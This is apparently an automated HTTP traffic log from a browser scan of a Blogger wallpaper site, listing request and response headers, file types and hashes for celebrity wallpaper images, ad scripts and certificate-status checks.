Md5:    77d8a90aece36cef965db76d0bbdacdc
Sha1:   351e55fe23192861af133e9be4388057d8b03e82
Sha256: 0950b17a5363ed6d59c6474df09c7cbd867edbe9898bbe9cac18a7b063378fb0
                                        
                                            GET /_gx7OZdt7Uhs/SpaNx4UI6-I/AAAAAAAACUA/HjRsWPocbcs/s320/Anastacia+Hot+Wallpaper.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v940"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Anastacia Hot Wallpaper.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 11305
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   11305
Md5:    0ad6cb6a3f25811ab22ded7bccb2bad9
Sha1:   32d0731b3e873769958e7227e58302611fc0374f
Sha256: 1ebe7eaba908a624b9a5c086a5136dd9ee2e935ac729032756e19c2a555c2981
                                        
                                            GET /_gx7OZdt7Uhs/SpaOSmXtc3I/AAAAAAAACVI/9R4m5uwG0Zk/s320/shakira+hot+and+sexy.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v952"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="shakira hot and sexy.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 33267
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   33267
Md5:    c5a8a32663cb2b7249c41cdee9abd868
Sha1:   f401ba36c37be01c8f42ef9db541adc08f87243c
Sha256: f240e9ae6ae04f70ce1a675f658035cc4adbdbbd1f19122971e99f18f1ea1004
                                        
                                            GET /_gx7OZdt7Uhs/SpaOgsePcCI/AAAAAAAACVQ/u0FdE6gfuAE/s320/shakira+hot+and+sexy.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v954"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="shakira hot and sexy.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 33267
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   33267
Md5:    c5a8a32663cb2b7249c41cdee9abd868
Sha1:   f401ba36c37be01c8f42ef9db541adc08f87243c
Sha256: f240e9ae6ae04f70ce1a675f658035cc4adbdbbd1f19122971e99f18f1ea1004
                                        
                                            GET /-STOfzSHYYek/UR74y0CyMII/AAAAAAAAAi4/u7jDiFAcafc/s1600/main-bg-pattern.png HTTP/1.1 
Host: lh4.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.1
HTTP/1.1 404 Not Found
Content-Type: image/png
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 832
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 200 x 200, 8-bit colormap, non-interlaced\012- data
Size:   832
Md5:    596246739a83bb45e30e13437e0810d9
Sha1:   203d99f5cb1f2c816d6f9974cc5a73cf412892a6
Sha256: 94aa7bf7f0d9660bb348ed4ed7faaa42c63f1a40f591dab32ce5046765df3615
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.36
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600, max-age=3600
Date: Thu, 29 Sep 2022 03:29:33 GMT
Expires: Thu, 29 Sep 2022 03:36:29 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 dac7cf040932e0c072eeed10afdd7b3e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: uEdef0u28FH2FrLkgqpkOnc7eW8t3sr6THBuiUSZm4wfnlSMpJmz_w==
Age: 1173


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /-ECTNoakfWH4/TcRKPv2iJ9I/AAAAAAAACBA/vqLMKb2fi28/w72-h72-p-k-no-nu/i-miss-you-love-9264842-1024-768.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="i-miss-you-love-9264842-1024-768.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 3182
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:06 GMT
Expires: Wed, 28 Sep 2022 02:54:57 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v810"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3182
Md5:    91b278736017f277559a5697a2b7ab75
Sha1:   9bad3308b703a6db9dde82c3e3bf0797da8bf368
Sha256: 21606c632862a924af7d478ddc02c08705838dfd9955289ba945c2490be9fa9f
                                        
                                            GET /_gx7OZdt7Uhs/SpaOQ2iwuSI/AAAAAAAACUw/HwT2VsiBJSI/s320/Schiffer+Sexy+Wallpaper.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v94c"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Schiffer Sexy Wallpaper.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 18201
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 257x320, components 3\012- data
Size:   18201
Md5:    c555f68804a3d1fb438b572463f8fb30
Sha1:   b12302d973c1ef4e1ba88794be01be190a09c32a
Sha256: 283608ff639d8eb209ba2c982439891c091351480bc3a02d50a23094527447cd
                                        
                                            GET /_gx7OZdt7Uhs/SpaNzmcA98I/AAAAAAAACUY/z-qE2Rva6bc/s320/ndian-film-wallpapers..jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v946"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="ndian-film-wallpapers..jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 18770
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   18770
Md5:    e8decbdcec1dc14a6d2415703b99e0c3
Sha1:   4c79b5fbf5eeb59636c97ff0bd3964e3e051e0f7
Sha256: 28cb1960df39d9640ac79d397f1ff7eda3ad7e2c57da3dfbb796587cebc3242d
                                        
                                            GET /_gx7OZdt7Uhs/SpaNyQkaL6I/AAAAAAAACUI/MCak3_LSHtU/s320/Hot+and+Sexy+Wallpapers.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v942"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Hot and Sexy Wallpapers.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 40473
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   40473
Md5:    cdaa4d96bc867cfcda99af79a5be040f
Sha1:   b24c8b1d1dbed32542b75d40de6e77d281bd8c3d
Sha256: af22539e4f560138948cf2398814382bd740bfb8ca81a14a611886d8b8b464a0
                                        
                                            GET /_gx7OZdt7Uhs/SpaOQdnPMII/AAAAAAAACUo/1v6WedoqwF8/s320/Paris+Hilton+Hot+and+Sexy.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v94a"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Paris Hilton Hot and Sexy.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 43968
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   43968
Md5:    1a22d3b6292cfa6a5a50fd4aece4333f
Sha1:   1df41f988387a740ee526bde6e52699454561cf0
Sha256: f4c5969f89fa16c571af2ded4d29084053c92f590d6a26605437507be717f766
                                        
                                            GET /_gx7OZdt7Uhs/SpaNzIqimgI/AAAAAAAACUQ/eW8s4nGLcrE/s320/Katie+Holmes+Sexy+wallpaper.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v944"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Katie Holmes Sexy wallpaper.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 28214
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   28214
Md5:    5317dcc829c8a43ea724491865c9e218
Sha1:   6d9c41fa3c2ed5d92be77a2a477ae844567e9049
Sha256: 442371bff5cc5a5da96c28628d0105d99e2e2c88e72984ac2a4ea2c54f4c668b
                                        
                                            GET /_gx7OZdt7Uhs/SpaOSMOOuMI/AAAAAAAACVA/9RU06-x_HMk/s320/sexy+Intime+Wallpaper.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v950"
Expires: Fri, 30 Sep 2022 03:49:06 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="sexy Intime Wallpaper.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:06 GMT
Server: fife
Content-Length: 33684
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   33684
Md5:    952049eed0c0d5986aed234a4e2ac771
Sha1:   cf2ba0eb7373d7bb2cf81ed208f9c0bbb8eecbfb
Sha256: 8d16b424d1606674cb03abdd01cb6b59bee9a71c05db1d355d0a1164ba7a2b52
                                        
                                            GET /-vCb4hBdxnD4/T0eoHtcsAII/AAAAAAAAAoU/ebP1Zsq5em0/w72-h72-p-k-no-nu/BlueMazeWp-long+goodbye.png HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="BlueMazeWp-long goodbye.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 10798
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Wed, 28 Sep 2022 02:54:57 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v285"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   10798
Md5:    c0085c06e873f186dab3b30e4d6a2644
Sha1:   9085ddbc1218d4f589ceaa8ae57f5d96d8c796b0
Sha256: 16edeb9ca63488a53d089feabd7561a41cd058d40bdfc38fa11469d7db64d80b
                                        
                                            GET /2013/01/free-mortgage-loan-rates.html HTTP/1.1 
Host: edoses.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/
Upgrade-Insecure-Requests: 1

                                         
                                         142.250.74.161
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 29 Sep 2022 03:49:06 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11872
Server: GSE


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (4043)
Size:   11872
Md5:    cf00eedf8d3b2f1928c19a3cfa5ab060
Sha1:   07d51f7b8d4a06d855cdc0da284a5d99ad49a49e
Sha256: 532fdb282757f68cbd7a8e2173b2a12945d9ac07cb980c36aa7d4fd1ead142e3
                                        
                                            GET /files/cueros%20-lazyload.js HTTP/1.1 
Host: cuerosb.googlecode.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         108.177.14.82
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
                                        
Referrer-Policy: no-referrer
Content-Length: 1588
Date: Thu, 29 Sep 2022 03:49:07 GMT


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1136)
Size:   1588
Md5:    422b4a3f70457a4389dd72b5fe861008
Sha1:   b2bd412908e6c54224f88d0c2535d83213893bd6
Sha256: fd64c4b6163ec431cdad562ebd9990811aae15f14e46bc6b26d85bae7bbf1645
                                        
                                            GET /_gx7OZdt7Uhs/SpaOhFx8meI/AAAAAAAACVY/ZRzvkuxkeAg/s320/Silverstone+Hot+Pics.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
ETag: "v956"
Expires: Fri, 30 Sep 2022 03:49:07 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Silverstone Hot Pics.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Thu, 29 Sep 2022 03:49:07 GMT
Server: fife
Content-Length: 17596
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 320x240, components 3\012- data
Size:   17596
Md5:    9d7a8949dfcb84a02d5e329b5298f6b6
Sha1:   488e6884422ed2d1476c5824077fd6a703ee6a48
Sha256: 7e2c8c5bab1cefd3dcecd675ef1b82f7f5fbfb427df3e777ee11a377de8b8160
                                        
                                            GET /js/cookienotice.js HTTP/1.1 
Host: edoses.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/2013/01/free-mortgage-loan-rates.html

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="blogger-tech"
Report-To: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
Content-Length: 2026
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 26 Sep 2022 14:15:32 GMT
Expires: Mon, 03 Oct 2022 14:15:32 GMT
Cache-Control: public, max-age=604800
Last-Modified: Mon, 26 Sep 2022 10:50:30 GMT
Age: 221615


--- Additional Info ---
Magic:  ASCII text
Size:   2026
Md5:    c4e1ed83d89245089b8a1203be20a377
Sha1:   f3940e1215b89300ef97d57a25993f25243b8688
Sha256: afa801a129ff6fc98533118275db8a7d4a38fc91f8ab55ed4c19b864255e68d2
                                        
                                            GET /js/infolinks_main.js HTTP/1.1 
Host: resources.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://edoses.blogspot.com/

                                         
                                         172.66.41.9
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 26 Sep 2022 13:11:59 GMT
ETag: W/"db3-5e99445d6610e"
Cache-Control: max-age=3600
Expires: Thu, 29 Sep 2022 03:39:32 GMT
Via: 1.1 google
CF-Cache-Status: HIT
Age: 4175
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7521bf3f3996b4e8-OSL
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (3506)
Size:   2119
Md5:    b2aafe70eecdf862b2de393264220a93
Sha1:   a3a2c7734e7088c6792a36c4da8e4523d7f9cbe3
Sha256: 46e843d4aa213e4fdfa6dd36c19424275192b0d44813a7788b22b4a44cdb1a07
                                        
                                            GET /-PgLNEBT6jNk/Ta22d_vvNYI/AAAAAAAABms/170t0FRWAEo/w72-h72-p-k-no-nu/900.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="900.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 3175
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Wed, 28 Sep 2022 02:54:57 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v66b"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3175
Md5:    b22efa14c58af0e4c626531091a4dafb
Sha1:   00d9783ac128aba61d88644b63f61b74f299161b
Sha256: 4428b35883bd650fcb8d718a2012b0e91521807386f1b75c7387318d643d35ed
                                        
                                            GET /-G4IGug2B34A/T-sPOfkxrMI/AAAAAAAAEtQ/fKkGoq_Gagc/w72-h72-p-k-no-nu/jism-2-2a.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://awesomew4llpapers.blogspot.com/

                                         
                                         142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="jism-2-2a.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 2584
X-XSS-Protection: 0
Date: Thu, 29 Sep 2022 03:49:07 GMT
Expires: Wed, 28 Sep 2022 02:54:57 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v12d4"
Age: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2584
Md5:    c6e1ebc1c467e808de705ff3807f3746
Sha1:   8d4db09481c6d79c76b859ff635e1489414b92db
Sha256: acb12764fee79c7cb197c966ddf1c3eab822d1e390c522ee9439e63705d5ec91
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:07 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6423
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:07 GMT
Last-Modified: Thu, 29 Sep 2022 02:02:04 GMT
